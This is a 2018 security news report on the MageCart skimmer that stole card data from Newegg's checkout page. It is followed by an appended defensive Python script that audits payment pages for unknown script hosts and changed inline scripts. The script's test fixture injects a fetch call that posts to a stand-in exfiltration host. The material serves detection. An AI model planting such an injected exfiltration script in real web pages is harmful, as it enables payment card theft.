Delaware, USA – September 20, 2018 — The next victim of the MageCart cybercrime group, which conducts high-profile skimming operations, has become known. Researchers from RiskIQ and Volexity discovered a skimmer on the website of the California retailer Newegg that sent customers' payment card data to an attacker-controlled server. Earlier this month, researchers discovered similar successful attacks on British Airways, the web push notification service Feedify and the broadcasting giant ABS-CBN. As in the previously uncovered attacks, the MageCart hackers placed malicious code on the page that processes financial transactions, and it stole payment card data from mid-August until September 18. The number of victims is still unknown, but given Newegg's popularity it may well run into the millions of the company's customers. To avoid raising suspicion, MageCart registered the domain 'neweggstats.com' and obtained an SSL certificate for that domain from Comodo. The skimmer code is similar to the one used in the attack on British Airways: it consists of only 15 lines of script, yet it was able to steal card data from both mobile and desktop customers.
The attacks reported this month show that the MageCart group targets the website of any organization that processes payments online. The adversaries attack large companies worldwide, and for each operation they register a separate domain and tailor the data-stealing script to the target. At the moment it is not known how the attackers gained access to the website. Judging by the intensity of the attacks, the campaign is gaining momentum. To detect attempts to compromise a site and inject malicious code in a timely manner, you can use your SIEM with the Web Application Framework rule pack: https://my.socprime.com/en/integrations/web-application-security-framework-arcsight
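One defender-side check that complements SIEM rules is an integrity audit of the payment page itself: compare the inline scripts against a known-good baseline and flag any script host that is not on the site's allowlist, which is exactly what a look-alike exfiltration domain like the one described above would trip. This is an added example and not code from the page, from RiskIQ, Volexity or SOC Prime; the page contents, the allowlist and the `checkout-stats.invalid` host are constructed.

```python
import hashlib
import re
from urllib.parse import urlparse

# Hosts the checkout page is allowed to load scripts from or talk to (constructed allowlist).
ALLOWED_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s"'<>()]+""")


def script_hosts(html):
    """Hosts referenced by <script src> tags and by absolute URLs inside inline scripts.
    Relative URLs (same origin) have no hostname and are ignored."""
    hosts = set()
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            hosts.add(urlparse(src.group(1)).hostname)
        for url in URL_RE.findall(body):
            hosts.add(urlparse(url).hostname)
    return {h for h in hosts if h}


def inline_script_hashes(html):
    """SHA-256 of every inline script body; a modified or newly injected block yields a new hash."""
    return sorted(hashlib.sha256(body.strip().encode()).hexdigest()
                  for attrs, body in SCRIPT_RE.findall(html)
                  if not SRC_RE.search(attrs) and body.strip())


def audit_checkout_page(html, baseline_hashes, allowed_hosts=ALLOWED_HOSTS):
    """Return hosts outside the allowlist and inline scripts absent from the baseline."""
    unknown_hosts = script_hosts(html) - set(allowed_hosts)
    new_scripts = [h for h in inline_script_hashes(html) if h not in baseline_hashes]
    return {"unknown_hosts": sorted(unknown_hosts), "new_inline_scripts": new_scripts}


# Constructed known-good checkout page and a constructed tampered copy with one extra inline script.
CLEAN_PAGE = """<html><body>
<script src="https://cdn.example-shop.test/checkout.js"></script>
<script>window.shop = {currency: "USD"};</script>
<form id="pay" action="/pay"></form></body></html>"""
TAMPERED_PAGE = CLEAN_PAGE.replace(
    "</body>", '<script>fetch("https://checkout-stats.invalid/c", {method: "POST"});</script></body>')
BASELINE = inline_script_hashes(CLEAN_PAGE)
```

Run the audit on every deployment and on a schedule against the live page; a non-empty result is the alert to forward to the SIEM.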